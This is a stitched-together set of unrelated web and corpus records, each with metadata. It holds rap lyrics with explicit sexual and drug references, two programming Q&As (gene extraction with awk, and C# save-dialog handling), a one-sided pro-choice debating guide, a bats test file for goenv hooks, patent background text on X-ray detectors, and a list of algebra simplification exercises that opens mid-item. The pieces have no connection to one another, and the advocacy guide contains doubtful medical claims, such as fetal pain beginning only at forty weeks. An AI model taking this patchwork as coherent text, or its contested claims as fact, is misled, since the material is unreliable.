In the wind, it's a bird, it's a plane
Now it be them hustlers with that skin tight game
In your mix, scopin you, scopin me
Eightball and MJG to the end, bustas we in the wind
Verse Two: Eightball
I sold my soul to this hustle, homeboy scratch what you heard
T front me a keyboard, I flipped it like a bird, word
on them streets be them Suave House beats
In the Benz blowin Sweets got your gal between my sheets
Speak -- I ain't have to say one little thang
The fame of my name blew the ghetto freak brain
Lookin for a meal ticket, she let me stick it
Wicked when she lick it, tryin to make me trick it
Girl, when I was broke it seemed all about the luxury
Now I got cheese, I got a pay a girl to love with me
But I'm a jelly worker, like Smuckers
Workin against them suckers, big facin just to love a
broad that done been around the world in a day
Bear lovin whoever got cheddar to pay
Ball like no trick ass, them shakers if I tip
I be drunk, in the club, smokin sticky cat nip
Slip, as if a banana peel was dropped in my path
into a body bodyworkin not discussin no math
Playa haters all around me as I stumble and grin
Snatch my vest, twist somethin, hit the rumble and then...
Chorus 2X
Verse Three: MJG, Eightball
I flip scripts on young dips who think they hip
Smoke up your whole zip, sess hydro or crip
Time and time again, stories have been told
About the super hustler dyin tryin to get the gold
Concrete jungle full of, carniverous firearm
Hunger for flesh, and pray on who ain't strong
Heavy weighters, with plenty hoes that buy em alligators
In the wind, breakin all big ?
Pick artificial tricks stolen money makers
Money trees come in please, help a player shake a
million down to the ground, feel them hits fall
Ride with me I'll run your game into a brick wall, trick y'all
is what this false literary do, then reality come
(and snatch the natural dust out you) who speaks the truth?
Whose your leeches? Whose your friends?
I plan to bring the realness back again, but until then
I'm in the wind
Chorus 4X | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.9113088250160216}", 'metadata': "{'Content-Length': '5990', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:XN6LTTWAYPRKYF7KP56XUCLB5GHVCA4O', 'WARC-Concurrent-To': '<urn:uuid:1b967a08-325c-4e5a-8721-09d6963170bf>', 'WARC-Date': datetime.datetime(2015, 2, 28, 17, 30, 39), 'WARC-IP-Address': '198.50.238.123', 'WARC-Identified-Payload-Type': None, 'WARC-Payload-Digest': 'sha1:KLPL3LHQNE33BE44FQETSVEU5VJCUFNF', 'WARC-Record-ID': '<urn:uuid:bac851fa-d192-4e79-89dd-6499d341392f>', 'WARC-Target-URI': 'http://ohhla.com/anonymous/eightmjg/rm_bside/the_wind.mjg.txt', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:bebd031a-cd20-455b-81e1-d6ead64511e5>', 'WARC-Truncated': 'length'}", 'previous_word_count': '620', 'url': 'http://ohhla.com/anonymous/eightmjg/rm_bside/the_wind.mjg.txt', 'warcinfo': 'robots: classic\r\nhostname: ip-10-28-5-156.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2015-11\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for February 2015\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.01859569549560547', 'original_id': '1894cf457aaae65a17c91f6ca72f62ecc2daee1726e6fca5afaeb6a0afa32a97'} |
Extract a specific gene from several prokka-annotated sequences
I annotated 500 sequences with Prokka from which I need to specifically extract only TcdA gene from all sequences, I need use the annotation of .ffn file of all sequences.
¿How can I do this automatically without having to open each folder of each sequence noted?
Prokka files:
Strain1
>Strain1.err
>Strain1.faa
>Strain1.fna
>Strain1.ffn *I use this file for extract gene*
I need the TcdA gene of the 500 sequences
Strain1_01428 glycosylating toxin TcdA
ATGTCTTTAATATCTAAAGAAGAGTTAATAAAACTCGCATATAGCATTAGACCAAGAGAA
AATGAGTATAAAACTATATTAACTAATTTAGACGAATATAATAAGTTAACTACAAACAAT
AATGAAAATAAATATTTACAATTAAAAAAACTAAATGAATCAATTGATGTTTTTATGAAT
AAATATAAAAATTCAAGCAGAAATAGAGCACTCTCTAATCTAAAAAAAGATATATTAAAA
GAAGTAATTCTTATTAAAAATTCCAATACAAGTCCTGTAGAAAAAAATTTACATTTTGTA
something like:
for i in /path/to/*.ffn; do awk 'BEGIN {RS=">"} /glycosylating toxin TcdA/ {print ">"$0}' $i > TcdA.fasta; done
Remember that Stack Overflow isn't just intended to solve the immediate problem, but also to help future readers find solutions to similar problems, which requires understanding the underlying code. This is especially important for members of our community who are beginners, and not familiar with the syntax. Given that, can you [edit] your answer to include an explanation of what you're doing and why you believe it is the best approach?
*It worked for me, only with a few modification '' and run in the same folder of my .ffn files:
for i in '*.ffn' ; do awk 'BEGIN {RS=">"} /glycosylating toxin TcdB/ {print ">"$0}' $i > TcdB.fasta; done
Thanks a lot !!
| common_corpus | {'identifier': 'https://stackoverflow.com/questions/72810755', 'collection': 'StackExchange', 'open_type': 'Open Web', 'license': 'CC-By-SA', 'date': '2022.0', 'title': 'Stack Exchange', 'creator': 'Daniell, Jeremy Caney, https://stackoverflow.com/users/16723402, https://stackoverflow.com/users/3025856', 'language': 'Estonian', 'language_type': 'Spoken', 'word_count': '218', 'token_count': '524', '__index_level_0__': '15047', 'original_id': '7ca12d4c7004dfff3e210feca00317425368aab4ffee38e30315c9fcba9ef3e2'} |
Q:
empty path name not legal
I have a "save" button so when users click, it will do a saving of xml file(xml serialization). A savefiledialog is used here and when i press cancel without selecting any file an "Argument Exception" occurs and says "Empty path name is not legal". How do i handle this exception? I would like the form to remain the same even without any path selected in the savefiledialog. Many thanks.
My savefiledialog snippet:
private void SaveButton_Click(object sender, RoutedEventArgs e)
{
string savepath;
SaveFileDialog DialogSave = new SaveFileDialog();
// Default file extension
DialogSave.DefaultExt = "txt";
// Available file extensions
DialogSave.Filter = "XML file (*.xml)|*.xml|All files (*.*)|*.*";
// Adds a extension if the user does not
DialogSave.AddExtension = true;
// Restores the selected directory, next time
DialogSave.RestoreDirectory = true;
// Dialog title
DialogSave.Title = "Where do you want to save the file?";
// Startup directory
DialogSave.InitialDirectory = @"C:/";
DialogSave.ShowDialog();
savepath = DialogSave.FileName;
DialogSave.Dispose();
DialogSave = null;
...
using (Stream savestream = new FileStream(savepath, FileMode.Create))
{
XmlSerializer serializer = new XmlSerializer(typeof(FormSaving));
serializer.Serialize(savestream, formsaving);
}
}
My argument exception occurs at this line:
using (Stream savestream = new FileStream(savepath, FileMode.Create))
{
XmlSerializer serializer = new XmlSerializer(typeof(FormSaving));
serializer.Serialize(savestream, formsaving);
}
A:
The problem here is that you do not care about the result of the Save dialog, and you try to save even if the user clicked Cancel. You should change the code to look something like this instead:
...
DialogSave.InitialDirectory = @"C:/";
if( DialogSave.ShowDialog() == DialogResult.OK )
{
savepath = DialogSave.FileName;
DialogSave = null;
...
using (Stream savestream = new FileStream(savepath, FileMode.Create))
{
XmlSerializer serializer = new XmlSerializer(typeof(FormSaving));
serializer.Serialize(savestream, formsaving);
}
}
DialogSave.Dispose();
A:
You probably don't want to save if the user cancels the dialog? Check for the result from ShowDialog and act accordingly:
if (DialogSave.ShowDialog() == true)
{
savepath = DialogSave.FileName;
...
using (Stream savestream = new FileStream(savepath, FileMode.Create))
{
XmlSerializer serializer = new XmlSerializer(typeof(FormSaving));
serializer.Serialize(savestream, formsaving);
}
}
| mini_pile | {'original_id': 'e2bc41c98a00a6ff81a8e866a66531974454a9644056157ed0846bf88c67ff27'} |
A Pro-Choice Rebuttal and Response Guide
by Craig Young
For ALRANZ members and other pro-choicers, here’s a handy quick guide to deconstructing anti-abortion propaganda.
(1) Anti-abortionists never use the correct medical terms for prenatal stages of development such as blastocyst, zygote, embryo or fetus. Instead, they use the deceptive and meaningless term “unborn child.” This term is intended to tap emotional resonances that we attach to our already born children and transfer them to prenatal stages of development within a pregnant person’s body.
(2) Anti-abortionists almost never use photographs of early prenatal stages of human development in anti-abortion propaganda. The earlier that it is, the less the embryo/fetus has an identifiable humanoid outline (and the more likely an abortion is to have occurred, according to clinical and statistical data). If they do, it’s based on the faulty and scientifically inaccurate argument that there are immaculate “stages” of prenatal development that “always” occur. This is an erroneous argument.
(3) They always emphasise some stages of prenatal development relative to others. “Life” does not “begin” at fertilisation- instead, as many as two thirds of blastocysts and zygotes fail to implant on a woman’s uterine wall and are flushed out at a woman’s next period. Ever wondered why anti-abortionists stopped campaigning against emergency contraception? Because given the microscopic nature of the blastocyst and zygote, and its appearance, they can’t win that argument.
(4) Later in fetal development, the anti-abortionists obsessively focus on the fetal heartbeat, which begins at about eight weeks of fetal development. That’s one stage, but there are others that pro-choicers can use instead. One is the development of alveolar respiratory development within the lungs, which develops late within the pregnancy, at about twenty-five weeks, long after most terminations are performed. Without this essential organ development, any fetus born beforehand will find it difficult to survive outside a pregnant person’s body. Anti-abortionists will protest that “advances” in premature infant preservation technology “invalidate” this observation. Ask them for proof and call their bluff when it comes to rates of survival and whether such infants survive for long after initial surgical intervention.
(5) Anti-abortionists used to emphasise “fetal pain” within their propaganda. Back in 1984, they were using a propaganda video called The Silent Scream. I then located pro-choice material from the United States, specifically a contemporary statement against this propaganda from the American College of Obstetricians and Gynecologists, which noted that the necessary fetal neurohormonal development necessary for it to “feel pain” is not in place until the fortieth week of pregnancy- long, long after most abortions have occurred. Members of the UK Royal College of Obstetricians and Gynecologists made similar observations.
(6) It is commonplace for anti-abortionists to use staged photographs of prenatal development which omit any photographs of women from their visual and verbal debate. Remedy this the way that Ireland’s Repeal movement did recently- through bringing women’s personal stories about pregnancy, abortion and childbirth back into the narrative.
(7) The ubiquitous outline of the fetus is used in anti-abortion propaganda, sometimes deceptively. When it comes to fetal abnormality, such photographs are not used. Instead, they try to use the ‘disability cleansing’ argument- despite the fact that with lethal fetal abnormalities, there is little chance that any resultant premature infant born as a result will survive from such anomalies. Moreover, many such late term terminations may be necessary for women’s lives and health. While these are comparatively rare, unfortunately the diagnostic techniques used to establish them cannot be used until late within the pregnancy.
(8) The ‘parental notification and consent’ argument can be dealt with by bringing up the question of incest and child battery in this context. Ask the anti-abortionists why they want to put a child through such trauma and psychological torment. The US National Abortion Rights Action League has useful fact sheets on this which you can use, as does ALRANZ.
(9) Two can play at that game. While abortion is a safe medical procedure, it may be worthwhile to point out health risks from pregnancy, particularly repeat pregnancies, and childbirth.
(10) Ask the anti-abortionists to cite their sources. If the sources turn out to be members of the breakaway anti-abortion US “American College of Pro-Life Obsetricians and Gynecologists”, “American College of Pediatrics”, “Doctors Who Respect Human Life” or any other such anti-abortion front group, go directly to these groups webpages and see whether these ‘medical sources’ are anti-abortion activists.
(11) Another point about anti-abortion sources- have they been cited in proper peer-reviewed medical journals? Do they reflect mainstream medical organisation evidence-based research or are they outliers? Even if they have been published in medical journals, check out the comments page, because this is useful in locating either anti-abortion fellow travellers or rebuttals from mainstream medical practitioners. Cite the rebuttals in any response.
(12) Also be aware if anti-abortionists cite any medical practitioner or scientific source from outside relevant disciplines. What may be standard professional practice within their disciplines may not be applicable outside it.
(13) One tool that can be used against them is any overt religious comments. On the one hand, they’re entitled to their specific religious viewpoints, but they should acknowledge that is what they are and identify them properly. Also note that there are pro-choice Christian denominations and perspectives from other faiths available in this context. There are even dissident Catholics- the much-loved Catholics for Choice, in the United States. Use the Catholics For Choice website against conservative Catholics. The US Religious Coalition for Reproductive Choice can be used for other pro-choice religious discourse against other anti-abortion sources.
(14) Also ask that given New Zealand is now a predominantly secular nation, why should specific sectarian religious anti-abortion positions that do not have scientific or medical corroboration be imposed on those who do not share them, whether nonreligious or people of pro-choice religious beliefs? This philosophical argument relies on religious freedom, which is protected within the NZ Bill of Rights Act 1990.
(15) Know your opponent. Monitor their websites, track their arguments to their sources and see whether mainstream medical practitioners or scientists have published online rebuttals of those arguments. Cite those in your responses. Always question their assertions and ask what their scientific and medical basis in fact is. Except, it’s usually not. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.9293509125709534}", 'metadata': "{'Content-Length': '38971', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:E6FB5MHBTGWTXJF7VU53WTJIYKF6EXGJ', 'WARC-Concurrent-To': '<urn:uuid:16256f28-2c6c-437b-998b-e59864627ec1>', 'WARC-Date': datetime.datetime(2019, 2, 16, 22, 3, 38), 'WARC-IP-Address': '202.191.34.81', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:AWK7TVBN6ZTQQ6LGPSGPBVB34UQNEPSH', 'WARC-Record-ID': '<urn:uuid:50237eb8-75aa-446a-9923-2c42c1350ad9>', 'WARC-Target-URI': 'http://alranz.org/guest-post-deconstructing-anti-abortion-propaganda/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:93b9f7d5-5c85-4e0b-bf6f-74da6fc9cabc>', 'WARC-Truncated': None}", 'previous_word_count': '1008', 'url': 'http://alranz.org/guest-post-deconstructing-anti-abortion-propaganda/', 'warcinfo': 'isPartOf: CC-MAIN-2019-09\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for February 2019\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-101-220-24.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.06157112121582031', 'original_id': '6dd0564650534cda2719923f3876ca7ecca3878ee7ca7398214bf8d7a75461e2'} |
#!/usr/bin/env bats
load test_helper
@test "has completion support" {
run goenv-hooks --complete
assert_success <<OUT
exec
rehash
version-name
version-origin
which
OUT
}
@test "prints usage help when no arguments are given" {
run goenv-hooks
assert_failure "Usage: goenv hooks <command>"
}
@test "prints list of hooks ending with '.bash', for given command" {
path1="${GOENV_TEST_DIR}/goenv.d"
GOENV_HOOK_PATH="$path1"
create_hook exec "hello.bash"
create_hook exec "ahoy.bash"
# NOTE: This command is expecte to be ignore since it's not ending with '.bash'
create_hook exec "invalid.sh"
# NOTE: This command is expected to be ignored since it's for a different command
create_hook which "ignored.bash"
path2="${GOENV_TEST_DIR}/etc/goenv_hooks"
GOENV_HOOK_PATH="$path2"
create_hook exec "bueno.bash"
GOENV_HOOK_PATH="$path1:$path2" run goenv-hooks exec
assert_success
assert_output <<OUT
${GOENV_TEST_DIR}/goenv.d/exec/ahoy.bash
${GOENV_TEST_DIR}/goenv.d/exec/hello.bash
${GOENV_TEST_DIR}/etc/goenv_hooks/exec/bueno.bash
OUT
}
@test "prints lists of hooks with spaces in path for given command" {
path1="${GOENV_TEST_DIR}/my hooks/goenv.d"
path2="${GOENV_TEST_DIR}/etc/goenv hooks"
GOENV_HOOK_PATH="$path1"
create_hook exec "hello.bash"
GOENV_HOOK_PATH="$path2"
create_hook exec "ahoy.bash"
GOENV_HOOK_PATH="$path1:$path2" run goenv-hooks exec
assert_success
assert_output <<OUT
${GOENV_TEST_DIR}/my hooks/goenv.d/exec/hello.bash
${GOENV_TEST_DIR}/etc/goenv hooks/exec/ahoy.bash
OUT
}
@test "prints list of hooks and resolves relative paths for given command" {
GOENV_HOOK_PATH="${GOENV_TEST_DIR}/goenv.d"
create_hook exec "hello.bash"
mkdir -p "$HOME"
GOENV_HOOK_PATH="${HOME}/../goenv.d" run goenv-hooks exec
assert_success "${GOENV_TEST_DIR}/goenv.d/exec/hello.bash"
}
@test "prints list of hooks and resolves symlinks for given command" {
path="${GOENV_TEST_DIR}/goenv.d"
mkdir -p "${path}/exec"
mkdir -p "$HOME"
touch "${HOME}/hola.bash"
ln -s "../../home/hola.bash" "${path}/exec/hello.bash"
touch "${path}/exec/bright.sh"
ln -s "bright.sh" "${path}/exec/world.bash"
GOENV_HOOK_PATH="$path" run goenv-hooks exec
assert_success <<OUT
${HOME}/hola.bash
${GOENV_TEST_DIR}/goenv.d/exec/bright.sh
OUT
}
| mini_pile | {'original_id': '893ebb05b018445a78b32e97dec4e703532c22c62594b6701f6d4cdc4e1eef2b'} |
1. Field of the Invention
The present invention relates to an X-ray detector and a method of manufacturing the same.
2. Description of the Related Art
X-ray detectors employing thin film transistors have been primarily utilized for diagnosis purposes. An X-ray detector is configured to output an X-ray image or X-ray transmission image in the form of a digital signal. Such an X-ray detector can be generally divided into two types, i.e. direct and indirect X-ray detectors.
In the direct X-ray detector, a photoconductive layer made of amorphous cerium (Ce) or the like is used to convert X-rays directly into electric charges. In the indirect X-ray detector, however, X-rays are converted into visible light by a scintillator and the converted visible light is then converted into electric charges by a photoelectric conversion device such as a photodiode. The direct X-ray detector has superior resolution, but dielectric breakdown may occur since high voltage levels are used in the direct X-ray detector. Accordingly, the reliability of the direct X-ray detector may be degraded. Further, a photoconductive material with a low dark current, high sensitivity, thermal stability and the like cannot be easily used for the direct X-ray detector. On the other hand, in the indirect X-ray detector, a photodiode or the like is used to generate a signal charge instead of using a high voltage as in the direct X-ray detector, thereby dielectric breakdown does not occur. Since basic technologies for a scintillator material, a photodiode or the like have been already established, the indirect X-ray detector can be easily commercialized. Accordingly, the indirect X-ray detector has been widely used.
To enhance the efficiency of a scintillator, the scintillator is formed by depositing a fluorescent material such as cesium iodide (CsI) into columnar single crystal. In a case where the scintillator is deposited directly on a lower substrate, the deposition process is performed at a temperature of 200° C. or more, which may cause a failure of the lower substrate. Accordingly, in an indirect X-ray detector, a scintillator is bonded to a lower substrate on which a thin film transistor, a photoelectric conversion device and the like are formed, and the efficiency of the detector greatly varies depending on the method of bonding the scintillator to the lower substrate. That is, if an air layer is introduced between the scintillator and the lower substrate when they are bonded to each other, reflection takes place at an interface between air and a medium due to a difference in refractive indexes of the air and the medium. Thus, the efficiency of light incident to the photoelectric conversion device is lowered. Meanwhile, if an air layer is partially introduced between the scintillator and the lower substrate, the uniformity of the indirect X-ray detector is degraded.
To prevent the production of such an air layer, in a related art, a reflective film and a scintillator are stacked on a glass substrate to fabricate a scintillator panel, and the scintillator panel is bonded to a lower substrate using an adhesive. However, once a scintillator panel is bonded to a lower substrate using an adhesive, the scintillator panel and the lower substrate cannot be separated to be reused even if defects are found. In particular, in a case where a resin is used as an adhesive, i.e. a liquid thermosetting resin is poured, pressed and cured between the scintillator panel and the lower substrate in order to bond the scintillator panel and the lower substrate together, the bonded scintillator panel and lower substrate cannot be separated when defects are found in the subsequent processes, and thus, the productivity is degraded. | mini_pile | {'original_id': '05f4f4d733d22619bbc373698db259f697a8b94351da31a4cd8372cab959775c'} |
9 + sqrt(19)
Simplify sqrt(539) + -3*sqrt(539)*4 - (sqrt(539)*2)**2*5.
-10780 - 77*sqrt(11)
Simplify -4 + (-1*sqrt(95))/sqrt(5) + 1.
-sqrt(19) - 3
Simplify sqrt(36)/(sqrt(972)*1 + sqrt(972)).
sqrt(3)/18
Simplify (sqrt(1331)*-2)**2 - (2*sqrt(275))**2.
4224
Simplify (sqrt(42)*2*-3)/(sqrt(216)/sqrt(9)).
-3*sqrt(7)
Simplify 4*(sqrt(76)*-1 + sqrt(76))**2.
0
Simplify (sqrt(162))**2*2*5.
1620
Simplify (4*sqrt(147)*-6)**2.
84672
Simplify sqrt(325)*-1*3.
-15*sqrt(13)
Simplify sqrt(3) + ((1 + sqrt(3))*-3 - sqrt(3))**2 + 0 + sqrt(75) + sqrt(3).
31*sqrt(3) + 57
Simplify ((sqrt(143) - (sqrt(143) + sqrt(143) + (1*sqrt(143) - sqrt(143)))*-2)/sqrt(11) + (sqrt(325) - sqrt(325)*1)*-5)**2.
325
Simplify 5 + (-3 + sqrt(21)/sqrt(3))**2.
-6*sqrt(7) + 21
Simplify (sqrt(4)/(sqrt(8)/sqrt(4)) + sqrt(2))**2 + 2.
10
Simplify (6*(-3 + 1 + 1*sqrt(300)))**2.
-1440*sqrt(3) + 10944
Simplify (-5*sqrt(133)*2 - sqrt(133))/sqrt(7).
-11*sqrt(19)
Simplify ((sqrt(156) - (sqrt(156) + 2*sqrt(156)))*5)/(sqrt(972)*1 - sqrt(12)).
-5*sqrt(13)/4
Simplify -2*(sqrt(24)/(((sqrt(108)*2 + sqrt(108) - sqrt(108)) + sqrt(108) - sqrt(108))/sqrt(9))*2)**2.
-4
Simplify 5*(5*-3*sqrt(11) - (sqrt(11) + sqrt(396)*6))**2.
148720
Simplify ((sqrt(250)/sqrt(125))/sqrt(10))**2.
1/5
Simplify (3*(1 + sqrt(304)))**2*1.
72*sqrt(19) + 2745
Simplify (-2*-1*sqrt(336))/(sqrt(72)/(sqrt(96) + sqrt(6) - sqrt(6))).
16*sqrt(7)
Simplify 4 + (-2*sqrt(52) + 3)**2.
-24*sqrt(13) + 221
Simplify 0 + sqrt(1300) + 3.
3 + 10*sqrt(13)
Simplify -5 + sqrt(114)/(sqrt(42)/sqrt(7)).
-5 + sqrt(19)
Simplify sqrt(288) + ((sqrt(288)*-2 + sqrt(288))*5)**2.
12*sqrt(2) + 7200
Simplify (-4*(0 + sqrt(2)))**2 + (sqrt(2) + sqrt(2) + 2)**2 + -2.
8*sqrt(2) + 42
Simplify ((sqrt(68) - (-5*(sqrt(68) + sqrt(68)*1) + sqrt(68))) + sqrt(68))/(sqrt(256)/sqrt(4)).
11*sqrt(17)/4
Simplify ((sqrt(2736) - (4 + sqrt(2736)))*5)**2 + -4.
396
Simplify sqrt(68)*-1 - sqrt(68)/sqrt(4)*5.
-7*sqrt(17)
Simplify -2*sqrt(3) + 3 + 6*sqrt(6)/sqrt(2).
3 + 4*sqrt(3)
Simplify 0 + (sqrt(272) - 1*sqrt(272))**2 + 0 + -2.
-2
Simplify 6*(sqrt(12)/(sqrt(24)/sqrt(4)))**2.
12
Simplify 6*(-5*(sqrt(3) - 1*sqrt(3)))**2 + 5.
5
Simplify (sqrt(153) + sqrt(17) + 5)*4.
20 + 16*sqrt(17)
Simplify sqrt(11)*-2*-1*-5 + sqrt(176)*3 + (sqrt(11) - (4*(sqrt(11) + 1 + sqrt(11)))**2).
-720 - 61*sqrt(11)
Simplify (6*sqrt(44) - ((sqrt(11) + -1)*6 - sqrt(11))) + (1 + sqrt(396) - (sqrt(132) + 2*sqrt(132))/sqrt(12))**2.
13*sqrt(11) + 106
Simplify (-6*sqrt(931)*1*5*2)**2.
3351600
Simplify (sqrt(228)/sqrt(300) + -1)*-1.
-sqrt(19)/5 + 1
Simplify (-1*sqrt(170)*2 + sqrt(170))/((sqrt(40)/sqrt(2))/sqrt(2) + sqrt(10)).
-sqrt(17)/2
Simplify (sqrt(44)/(sqrt(4)*2))**2 - (-4 + 1*sqrt(11))**2.
-97/4 + 8*sqrt(11)
Simplify sqrt(40)/(-3*sqrt(128)).
-sqrt(5)/12
Simplify (-4 + sqrt(363)*1 + sqrt(363) - sqrt(363))**2.
-88*sqrt(3) + 379
Simplify (sqrt(21)/(sqrt(3)*-2*-3))**2*-3.
-7/12
Simplify sqrt(68)/sqrt(64)*-2.
-sqrt(17)/2
Simplify ((5*sqrt(200))/sqrt(10) - (1 + sqrt(605)*-2))**2.
-64*sqrt(5) + 5121
Simplify sqrt(68)/(sqrt(12)/sqrt(3)) + sqrt(119)/sqrt(63).
4*sqrt(17)/3
Simplify (-1 + sqrt(68) + sqrt(68))*1.
-1 + 4*sqrt(17)
Simplify sqrt(396) + ((sqrt(396) - 4*sqrt(396)*-1)**2 - sqrt(396)) + -5.
9895
Simplify sqrt(8)/(sqrt(4)*2) + (0 + sqrt(2) + 3)**2.
13*sqrt(2)/2 + 11
Simplify ((sqrt(63) + -1)*4)**2.
-96*sqrt(7) + 1024
Simplify (sqrt(396)*1)/((sqrt(36)*-1)/sqrt(9) - sqrt(4)).
-3*sqrt(11)/2
Simplify ((sqrt(136)*-2 - sqrt(136))/sqrt(8))**2*-3.
-459
Simplify (sqrt(19) - (1 + sqrt(228)/sqrt(12) - sqrt(19)))*-5.
-5*sqrt(19) + 5
Simplify sqrt(3) + 1 + 1 + sqrt(300)*-2 + sqrt(300).
-9*sqrt(3) + 2
Simplify (-6*(1 + sqrt(684)))**2.
432*sqrt(19) + 24660
Simplify (sqrt(1700) + (-2 + sqrt(1700) - sqrt(1700) - sqrt(1700)))**2 - (1 + sqrt(17) + 0 + sqrt(17) + sqrt(17)).
-3*sqrt(17) + 3
Simplify (3*1*sqrt(114))/(sqrt(6) + sqrt(6) + (sqrt(216) - -3*sqrt(216))).
3*sqrt(19)/26
Simplify -5 + 3 + sqrt(5)*-2.
-2*sqrt(5) - 2
Simplify (sqrt(832)*-1 - (-2*sqrt(26))/sqrt(2))*2.
-12*sqrt(13)
Simplify (sqrt(120)/sqrt(6)*6 - sqrt(20))/sqrt(4).
5*sqrt(5)
Simplify (3*(sqrt(1573) - (sqrt(1573) - 3*sqrt(1573)) - sqrt(1573)))**2 + (sqrt(1573) - sqrt(1573)*-1)*-3.
-66*sqrt(13) + 56628
Simplify (3 + -1 + sqrt(931) - sqrt(931))**2*-3.
-12
Simplify (sqrt(180) - ((-3 + sqrt(180) - sqrt(180)) + -4 + sqrt(180) + sqrt(180)))**2.
-84*sqrt(5) + 229
Simplify ((sqrt(637) - (-3 + sqrt(637)*-1))*-4*1)**2.
1344*sqrt(13) + 40912
Simplify sqrt(5) + (4*(sqrt(20)/sqrt(4) - sqrt(5)))**2 + sqrt(5) + (sqrt(5) - -3*(-1 + sqrt(5))) + (sqrt(245) + 1)*-6.
-36*sqrt(5) - 9
Simplify sqrt(40)/((sqrt(72) + sqrt(72)*6 + sqrt(72))/sqrt(9) + sqrt(8)).
sqrt(5)/9
Simplify (6*(sqrt(228)*2 + sqrt(228) - sqrt(228))/sqrt(3))**2.
10944
Simplify (sqrt(2)*2*-2 + sqrt(24)/(sqrt(60)/sqrt(5)))**2.
18
Simplify 0 + sqrt(405).
9*sqrt(5)
Simplify ((-1*sqrt(65)*-3)/sqrt(5))**2.
117
Simplify (2*(4 + -2 + sqrt(2) + -1)*-3)**2.
72*sqrt(2) + 108
Simplify ((sqrt(143) + sqrt(143)*1*-4 - sqrt(143)) + sqrt(143))/sqrt(11).
-3*sqrt(13)
Simplify -5*((sqrt(7) - sqrt(112))*6*-2 + 0).
-180*sqrt(7)
Simplify sqrt(170)/sqrt(1440) - (sqrt(153) - sqrt(17))**2*3.
-204 + sqrt(17)/12
Simplify (sqrt(44) + -2)*-4.
-8*sqrt(11) + 8
Simplify sqrt(22)/sqrt(32) + sqrt(55)/sqrt(5)*-6.
-23*sqrt(11)/4
Simplify -1 + (2 + sqrt(48))**2.
16*sqrt(3) + 51
Simplify ((sqrt(180) - (sqrt(180) + -1)**2 - sqrt(180)) + -5)*-4.
-48*sqrt(5) + 744
Simplify sqrt(304) + sqrt(304)*-1 + (sqrt(76)*-1)/sqrt(4).
-sqrt(19)
Simplify (-4 + -4 + sqrt(11)*2)**2*3.
-96*sqrt(11) + 324
Simplify ((2 + sqrt(5))*-2*-3)**2 + 2.
144*sqrt(5) + 326
Simplify sqrt(152)/sqrt(8)*-5 - sqrt(1539)*-3.
22*sqrt(19)
Simplify (-2*sqrt(4455))/(sqrt(11) + sqrt(1331) + sqrt(1331)*2 + sqrt(1331)).
-2*sqrt(5)/5
Simplify 1*sqrt(19)*1 - (sqrt(19) + 1)*-6.
6 + 7*sqrt(19)
Simplify ((sqrt(3) + -1)*4)**2 - ((sqrt(3) + 3)**2 + 5).
-38*sqrt(3) + 47
Simplify ((sqrt(27) - sqrt(81)/sqrt(3)*6)/(sqrt(576)*-3 + sqrt(9)))**2.
75/529
Simplify sqrt(126)/(sqrt(6)/sqrt(3)) + sqrt(63).
6*sqrt(7)
Simplify (-1*sqrt(300)*1)**2.
300
Simplify (1*sqrt(117) + sqrt(117) + -2)**2.
-24*sqrt(13) + 472
Simplify (sqrt(810)*-1)/sqrt(5).
-9*sqrt(2)
Simplify (sqrt(44)/(sqrt(8)/sqrt(4)) + sqrt(22))/(sqrt(396) + (-1*sqrt(396) - sqrt(396))).
-sqrt(2)/3
Simplify (1*sqrt(2448) + -4)**2.
-96*sqrt(17) + 2464
Simplify ((sqrt(132) + sqrt(132) + (((sqrt(132) - (sqrt(132) + -2*sqrt(132)) - sqrt(132)) + sqrt(132) - sqrt(132)) + sqrt(132))*-5)/sqrt(12))**2.
704
Simplify (5*(0 + sqrt(343)))**2.
8575
Simplify 3*(4*(sqrt(208) - sqrt(208)*-2) + 3)**2.
864*sqrt(13) + 89883
Simplify (sqrt(117) - (0 + sqrt(117))) + -1.
-1
Simplify (sqrt(1029)/sqrt(7) - sqrt(12)/(-5*sqrt(4)))**2.
3888/25
Simplify (-4*(sqrt(1700) - 1*(sqrt(1700) + sqrt(1700) + 0))*5)**2.
680000
Simplify -3*(sqrt(192) + sqrt(192) + -2) - sqrt(192).
-56*sqrt(3) + 6
Simplify (-1*sqrt(1300))**2 + -1 + -2.
1297
Simplify sqrt(170)/(sqrt(110)/(sqrt(44)/sqrt(4))).
sqrt(17)
Simplify (sqrt(363)/(sqrt(11) + sqrt(11)*1))/(sqrt(11) + sqrt(121)/sqrt(44)).
sqrt(3)/3
Simplify (2*(sqrt(1584) - (-1 + sqrt(1584))))**2 + 5.
9
Simplify (sqrt(1539)*6 + (sqrt(19) - sqrt(76)*4))**2.
41971
Simplify (sqrt(143)/(-2*sqrt(11))*4)**2.
52
Simplify -3 + (sqrt(1216)*1 - (sqrt(19)*2 + 4)**2).
-95 - 8*sqrt(19)
Simplify -3 + ((1 + sqrt(3))**2 + sqrt(3) + sqrt(3) - sqrt(3))*6*6.
141 + 108*sqrt(3)
